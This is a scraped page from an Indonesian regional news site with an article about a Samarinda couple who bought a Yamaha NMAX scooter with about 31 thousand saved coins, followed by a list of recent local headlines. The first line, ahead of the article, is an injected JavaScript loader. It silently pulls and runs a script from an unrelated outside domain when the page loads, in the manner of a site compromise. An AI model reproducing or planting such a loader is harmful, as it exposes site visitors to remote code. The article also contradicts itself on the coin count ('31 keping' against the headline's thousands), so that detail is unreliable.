(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
WARGA+62

Beli Motor, Pasutri Ini Bawa 31 Ribu Keping Koin


KANALKALIMANTAN.COM – Membawa puluhan ribu koin di dalam kantong plastik, pasangan suami istri (Pasutri) tiba di Dealer Sentral Yamaha Samarinda, Jalan Agus Salim No 18 pada Jumat (9/4/2021) lalu. Mereka membeli satu unit motor All New NMAX.

Tampak sepasang suami istri datang dengan membawa puluhan kantong yang berisikan uang koin.

Pasutri tersebut ialah Totok Tri Bartonnanto dan Hasnaini. Mereka membeli NMAX seharga Rp 31 juta menggunakan uang koin, yang jumlahnya mencapai 31 keping.

Saking banyaknya uang koin, saat pasutri tersebut hendak masuk ke dealer, para karyawan di sana bahkan harus turut membantu.

 

Baca juga: CATAT! Ini Tahapan Langkah Peserta UTBK SBMPTN 2021 Saat Tiba di Lokasi Ujian

“Iya dibantu juga pas disana sama pihak Yamaha membawa uang koinnya. Lumayan berat,” ucap Hasnaini, dilansir dari Inibalikpapan.com, media jaringan Suara.com.

Ternyata, uang koin tersebut merupakan tabungan Hasnaini bersama sang suami.
Usai tabungan dirasa cukup, mereka pun membawa uanh koin tersebut ditambah beberapa uang kertas untuk membeli sebuah All New NMAX.

“Uang koin itu uang tabungan saya dan suami yang memang kami kumpulkan. Memang sengaja untuk membeli sesuatu. Dan sudah terkumpul banyak, jadi kita beli kendaraan, atas nama saya,” ungkapnya.

Mengenai pilihan kendaraan, Hasnaini mengatakan dirinya sudah lama menjadi konsumen Yamaha. Sebutnya, ia sebelumnya telah memiliki motor Yamaha Aerox.

Atas dasar kenyamanan lah yang membuat Hasnaini dan suami kembali memilih produk Yamaha dan kali ini adalah All New NMax.

Baca juga: Pemkab HSU Keluarkan Surat Edaran Terkait Ramadhan

“Kenapa saya memilih NMax, karena memang sebelumnya saya sudah punya Yamaha Aerox. Nyaman digunakan. Begitu juga NMax yang menurut saya nyaman untuk digunakan dalam keseharian kita,” jelasnya.

Memang, All New NMax ini memiliki beberapa keunggulan yang cukup menjadi daya tarik bagi para konsumen pecinta motor matic. Salahnya adalah lampu depannya lebih tajam ketimbang versi lawasnya.

Desain lampu belakangnya pipih mirip XMax. Kemudian ada juga fitur yang lebih konektivitas, spidometer Informatif, kompartemen fungsional, serta fitur serba smart. (suara.com)

Editor : kk


Al Ghifari

Recent Posts

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

8 menit ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

49 menit ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

4 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

5 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

16 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

16 jam ago

This website uses cookies.